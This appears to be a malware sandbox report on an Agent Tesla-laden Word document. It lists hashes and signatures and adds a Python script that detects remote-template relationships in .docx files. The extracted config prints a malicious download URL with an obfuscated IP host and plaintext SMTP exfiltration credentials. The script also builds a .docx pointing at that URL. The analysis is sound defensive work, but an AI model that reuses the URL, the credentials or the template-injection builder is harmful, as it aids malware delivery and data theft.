General
Target: productXspecifications.docx.doc
Size: 10KB
Sample: 230215-kywtasbb63
MD5: a54faaf77e243d002a066ed24194f186
SHA1: 4f7ec24108e808a8ee6cbf77e2f1f760afc19dbe
SHA256: 45c80bfc78f3864e69056d98e91847c0da257e05469f1538978aa6e844f49224
SHA512: 6f5bf069c2ba67da690b4f1ed5798a69f410980f0e838c6fe24c9b616292adc8a1d0ffe989e35fd5b50898f89f43450827097b2cefb787583869ea6f9cdfc275
SSDEEP: 192:ScIMmtP5hG/b7XN+eOSFbO+5+5F7Jar/YEChI3hBt:SPXRE7XtOa7wtar/YECOF
Static task: static1
Behavioral task: behavioral1 (sample: productXspecifications.docx, resource: win7-20221111-en)
Behavioral task: behavioral2 (sample: productXspecifications.docx, resource: win10v2004-20220812-en)
Malware Config
Extracted (remote template URL, kept verbatim as recovered from the document; note the single slash after "http:", which Word tolerates, the run of letters before "@" is URL userinfo that a reader skims over, and the host 1806682775 is an IPv4 address written as one decimal integer):
http:/QQQQWWWWQWWWWQWWQWQWQWQQWQWQQWQWQWQWQWQWQWQQQQQQQQOQQQQQOOOOOOOOQOQQQQOQOQOQOQOQOQQWWWWQWQWQWQWQWQWQWQWQQWQ@1806682775/OO.DOC
Extracted: agenttesla
Protocol: smtp
Host: us2.smtp.mailhostbox.com
Port: 587
Username: lawsaman@steveboi.com
Password: !Gphfth8
Email To: lawsaman@steveboi.com
Targets
Target: productXspecifications.docx.doc
Size: 10KB
MD5: a54faaf77e243d002a066ed24194f186
SHA1: 4f7ec24108e808a8ee6cbf77e2f1f760afc19dbe
SHA256: 45c80bfc78f3864e69056d98e91847c0da257e05469f1538978aa6e844f49224
SHA512: 6f5bf069c2ba67da690b4f1ed5798a69f410980f0e838c6fe24c9b616292adc8a1d0ffe989e35fd5b50898f89f43450827097b2cefb787583869ea6f9cdfc275
SSDEEP: 192:ScIMmtP5hG/b7XN+eOSFbO+5+5F7Jar/YEChI3hBt:SPXRE7XtOa7wtar/YECOF
Signatures:
AgentTesla
Agent Tesla is a .NET-based remote access tool (RAT) and information stealer written in Visual Basic (.NET); the extracted configuration above shows this build exfiltrating over SMTP on port 587.
Blocklisted process makes network request
Downloads MZ/PE file
Abuses OpenXML format to download file from external location
Executes dropped EXE
Loads dropped DLL
Uses the VBS compiler for execution
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
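The two findings worth reproducing by hand before trusting the sandbox verdict are the remote-template relationship that the "Abuses OpenXML format to download file from external location" signature fires on, and the obfuscated URL in the extracted config. The script below is an added example, not Triage's own detection logic or code from the report: it unpacks a .docx, lists every `.rels` relationship with `TargetMode="External"`, keeps the types Word fetches at open time, and normalises the target URL (repairs the single-slash scheme, drops the userinfo, and decodes a decimal, hex or octal host into dotted-quad form). The only sample it scans is a minimal .docx it constructs itself (the report's 10KB sample is not embedded here); the template URL string is copied from the report, and the dotted-quad form is simply the decimal host 1806682775 converted.

```python
"""Find open-time external relationships in a .docx and normalise their URLs."""
import io
import ipaddress
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit
from xml.sax.saxutils import quoteattr

PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# Remote-template URL exactly as the report's extracted config shows it. The text
# before "@" is RFC 3986 userinfo; the host is an IPv4 address as a decimal integer.
REPORT_TEMPLATE_URL = (
    "http:/QQQQWWWWQWWWWQWWQWQWQWQQWQWQQWQWQWQWQWQWQWQQQQQQQQOQQQQQOOOOOOOOQOQQQQ"
    "OQOQOQOQOQOQQWWWWQWQWQWQWQWQWQWQWQQWQ@1806682775/OO.DOC"
)

# Relationship types whose external target Word retrieves while opening the file
# (a plain hyperlink needs a click, so it is deliberately not in this set).
FETCHED_AT_OPEN = {"attachedTemplate", "oleObject", "frame", "image", "subDocument"}


def normalize_url(url: str) -> str:
    """Canonicalise an obfuscated URL: scheme://host[:port]path[?query]."""
    # Word accepts "http:/host"; urlsplit does not, so repair the missing slash first.
    url = re.sub(r"^(https?):/(?!/)", r"\1://", url, flags=re.IGNORECASE)
    parts = urlsplit(url)
    host = parts.hostname or ""          # .hostname already strips userinfo
    try:
        # int(x, 0) parses decimal, 0x... hex and 0o... octal integer hosts.
        host = str(ipaddress.IPv4Address(int(host, 0)))
    except ValueError:
        pass                              # ordinary hostname or dotted quad: keep it
    try:
        port = f":{parts.port}" if parts.port else ""
    except ValueError:                    # malformed port: drop it rather than crash
        port = ""
    query = f"?{parts.query}" if parts.query else ""
    return f"{parts.scheme.lower()}://{host}{port}{parts.path}{query}"


def external_relationships(docx_bytes: bytes):
    """Yield (rels part, short relationship type, raw target) for every external rel."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append((name, rel_type, rel.get("Target", "")))
    return found


def suspicious_external_targets(docx_bytes: bytes):
    """External rels Word would fetch at open time, with their URLs normalised."""
    return [(part, rel_type, normalize_url(target))
            for part, rel_type, target in external_relationships(docx_bytes)
            if rel_type in FETCHED_AT_OPEN]


def build_sample_docx(template_url: str, hyperlink_url: str = "https://example.invalid/") -> bytes:
    """Constructed minimal .docx carrying a remote attachedTemplate (test input only)."""
    settings_rels = (
        f'<Relationships xmlns="{PKG_REL_NS}"><Relationship Id="rId1" '
        f'Type="{OFFICE_REL}/attachedTemplate" Target={quoteattr(template_url)} '
        f'TargetMode="External"/></Relationships>'
    )
    document_rels = (
        f'<Relationships xmlns="{PKG_REL_NS}">'
        f'<Relationship Id="rId1" Type="{OFFICE_REL}/settings" Target="settings.xml"/>'
        f'<Relationship Id="rId2" Type="{OFFICE_REL}/hyperlink" '
        f'Target={quoteattr(hyperlink_url)} TargetMode="External"/></Relationships>'
    )
    w_ns = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
    parts = {
        "[Content_Types].xml": '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        "_rels/.rels": (f'<Relationships xmlns="{PKG_REL_NS}"><Relationship Id="rId1" '
                        f'Type="{OFFICE_REL}/officeDocument" Target="word/document.xml"/></Relationships>'),
        "word/document.xml": f'<w:document xmlns:w="{w_ns}"><w:body/></w:document>',
        "word/settings.xml": (f'<w:settings xmlns:w="{w_ns}" xmlns:r="{OFFICE_REL}">'
                              f'<w:attachedTemplate r:id="rId1"/></w:settings>'),
        "word/_rels/document.xml.rels": document_rels,
        "word/_rels/settings.xml.rels": settings_rels,
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    for part, rel_type, url in suspicious_external_targets(build_sample_docx(REPORT_TEMPLATE_URL)):
        print(f"{part}: {rel_type} -> {url}")
```

Point `suspicious_external_targets` at the bytes of a real sample to get the same listing; the decoded dotted-quad host is what to search for in proxy logs and block at egress, since the decimal form in the document will not match a string search for the IP. The hyperlink relationship is filtered out on purpose: it is external too, but it only resolves when a user clicks it, so it belongs in a lower-severity bucket than an attachedTemplate that fires on open.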